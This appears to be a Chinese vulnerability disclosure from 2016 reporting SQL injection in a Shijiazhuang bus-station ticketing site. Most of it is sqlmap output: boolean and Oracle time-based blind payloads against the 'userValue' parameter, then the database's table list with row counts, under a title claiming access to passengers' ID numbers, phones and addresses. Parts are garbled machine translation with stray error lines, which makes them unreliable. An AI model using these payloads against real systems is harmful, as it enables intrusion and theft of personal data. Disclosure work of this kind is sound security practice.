漏洞标题 石家庄客运总站某站点SQL注入(含旅客身份证号\手机号\住址\订单时间去向) 相关厂商 石家庄客运总站 漏洞作者 路人甲 提交时间 2016-04-27 20:10 公开时间 2016-06…
Failure when receiving data from the peer
Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3
userValue参数存在注入
盲目,直接在SQLMAP上
漏洞证明:
参数:#1 *(URI)
输入:基于布尔值的盲
标题: AND基于布尔的盲 - WHERE或H * ING子句
有效载荷: **。**。**。**: 80/CheckUserValue?userValue=admin'and'1'='1'AND 9336=9336 AND'CUrZ'='CUrZ
输入:和/或基于时间的盲
标题: Oracle和基于时间的盲人
有效载荷: **。**。**。**: 80/CheckUserValue?userValue=admin'and'1'='1'AND 5097=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)|| CHR(118)|| CHR (85)|| CHR(99),5)AND'NaxB'='NaxB
---
后端DBMS: Oracle
当前架构(相当于Oracle上的数据库):'SJZWEB'
数据库: SJZWEB
+ ----------------------- + --------- +
|表|参赛作品|
+ ----------------------- + --------- +
| TB_WEB_ERROR | 2980653 |
| TB_WEB_USER_LOG | 610631 |
| TB_WEB_LOG | 422999 |
| TB_IMAGE_VALID | 72548 |
| TB_WEB_ALIPAY | 69898 |
| TB_WEB_SEAT_LOCK | 33135 |
| TB_WEB_ORDER | 26011 |
| TB_WEB_USER | 16203 |
| TB_WEB_USER_ONLINE | 13147 |
| TB_WEB_MSG_SEND | 2033年|
| TB_WEB_ORDER_BUILD | 1191 |
| TB_CITY | 363 |
| TB_NEW_SCHEDULE | 172 |
| TB_WEB_TICKETSALE_UPD | 125 |
| TB_WEB_ALL_ROUTE | 101 |
| TB_PROVINCE | 34 |
Failure when receiving data from the peer